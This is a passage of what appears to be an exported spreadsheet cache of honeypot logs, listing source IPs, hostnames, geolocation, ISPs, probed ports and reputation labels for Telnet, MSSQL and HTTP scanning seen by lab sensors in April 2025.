    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Communication Ltd"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f7:40fe"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3187"/>
    <x v="3187"/>
    <s v="NA&amp;&amp;220-133-16-169.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T11:13:25"/>
    <d v="2024-12-16T02:29:43"/>
    <d v="2025-04-04T11:13:25"/>
    <n v="168"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23&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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:10a9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3188"/>
    <x v="3188"/>
    <s v="220-135-166-99.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:13:25"/>
    <d v="2024-09-12T01:43:00"/>
    <d v="2025-04-04T11:13:25"/>
    <n v="232"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;55977&amp;&amp;34736&amp;&amp;34728&amp;&amp;34746&amp;&amp;9100&amp;&amp;80&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NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:a663"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3189"/>
    <x v="3189"/>
    <s v="59-126-23-220.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:12:38"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T11:12:38"/>
    <n v="517"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;16065&amp;&amp;23&amp;&amp;13791&amp;&amp;59380&amp;&amp;9100&amp;&amp;80&amp;&amp;52907&amp;&amp;43167&amp;&amp;43187&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:17dc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3190"/>
    <x v="3190"/>
    <s v="59-126-185-198.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:12:35"/>
    <d v="2024-12-26T23:34:05"/>
    <d v="2025-04-04T11:12:35"/>
    <n v="67"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23&amp;&amp;40588&amp;&amp;40606&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:b9c6"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3191"/>
    <x v="3191"/>
    <s v="220-134-133-190.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:12:27"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T11:12:27"/>
    <n v="275"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8512&amp;&amp;23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:85be"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3192"/>
    <x v="3192"/>
    <s v="NA&amp;&amp;125-229-164-158.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T11:12:16"/>
    <d v="2024-12-15T19:02:21"/>
    <d v="2025-04-04T11:12:16"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;19044&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NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:a49e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3193"/>
    <x v="3193"/>
    <s v="NA&amp;&amp;1-34-235-81.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T11:12:16"/>
    <d v="2024-12-16T21:54:05"/>
    <d v="2025-04-04T11:12:16"/>
    <n v="461"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;60100&amp;&amp;39989&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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:eb51"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3194"/>
    <x v="3194"/>
    <s v="125-229-120-41.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T11:03:56"/>
    <d v="2025-01-05T15:17:38"/>
    <d v="2025-04-04T11:03:56"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:7829"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3195"/>
    <x v="3195"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:58:39"/>
    <d v="2025-04-04T10:57:41"/>
    <d v="2025-04-04T10:58:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:a21f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3196"/>
    <x v="3196"/>
    <s v="NA&amp;&amp;105-165.cdn.ge"/>
    <x v="0"/>
    <d v="2025-04-04T10:54:56"/>
    <d v="2025-03-11T20:22:24"/>
    <d v="2025-04-04T10:54:56"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="55586&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="GE"/>
    <s v="Georgia"/>
    <s v="TB"/>
    <s v="Tbilisi"/>
    <s v="NA"/>
    <s v="Tbilisi"/>
    <s v="611717"/>
    <s v="NA"/>
    <s v="41.6941"/>
    <s v="44.8337"/>
    <s v="24997"/>
    <s v="Caucasus Digital Network LTD"/>
    <s v="CDN-165/24"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2002-06-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-07-04 00:00:00"/>
    <s v="2025-07-05 00:00:00"/>
    <s v="NA"/>
    <s v="['ns.cdn.ge', 'ns2.cdn.ge']"/>
    <s v="grena"/>
    <s v="ok"/>
    <s v="None"/>
    <x v="35"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:d90b:a569"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3197"/>
    <x v="3197"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:53:35"/>
    <d v="2025-04-04T10:51:46"/>
    <d v="2025-04-04T10:53:35"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Bharthana Kosad"/>
    <s v="13157056"/>
    <s v="NA"/>
    <s v="21.2666"/>
    <s v="72.8709"/>
    <s v="133246"/>
    <s v="softnet network"/>
    <s v="softnet network"/>
    <s v="business"/>
    <s v="NIXI"/>
    <s v="2023-03-02"/>
    <s v="SNPLSURAT"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6764:b2e1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3198"/>
    <x v="3198"/>
    <s v="133-175-255-231.tokyo.fdn.vectant.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:51:18"/>
    <d v="2025-04-04T07:36:29"/>
    <d v="2025-04-04T10:51:18"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Koto"/>
    <s v="Tōyō"/>
    <s v="1864055"/>
    <s v="NA"/>
    <s v="35.6698"/>
    <s v="139.815"/>
    <s v="2519"/>
    <s v="ARTERIA Networks Corporation"/>
    <s v="ARTERIA Networks Corporation"/>
    <s v="business"/>
    <s v="Toray Industries, Inc."/>
    <s v="1997-03-01"/>
    <s v="JPNIC-NET-JP-ERX"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.vectant.ne.jp', 'ns2.vectant.ne.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/09/30)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:85af:ffe7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3199"/>
    <x v="3199"/>
    <s v="220-134-133-35.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:49:36"/>
    <d v="2023-07-24T18:30:35"/>
    <d v="2025-04-04T10:49:36"/>
    <n v="6142"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;1080&amp;&amp;80&amp;&amp;57215&amp;&amp;23&amp;&amp;34407&amp;&amp;37264&amp;&amp;37269&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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:8523"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3200"/>
    <x v="3200"/>
    <s v="cpc91730-watf12-2-0-cust220.15-2.cable.virginm.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:49:28"/>
    <d v="2025-02-19T04:55:09"/>
    <d v="2025-04-04T10:49:28"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Hertfordshire"/>
    <s v="Watford"/>
    <s v="2634677"/>
    <s v="WD1"/>
    <s v="51.6565"/>
    <s v="-0.39032000000000006"/>
    <s v="5089"/>
    <s v="Virgin Media Limited"/>
    <s v="Virgin Media"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5214:add"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3201"/>
    <x v="3201"/>
    <s v="NA"/>
    <x v="0"/>
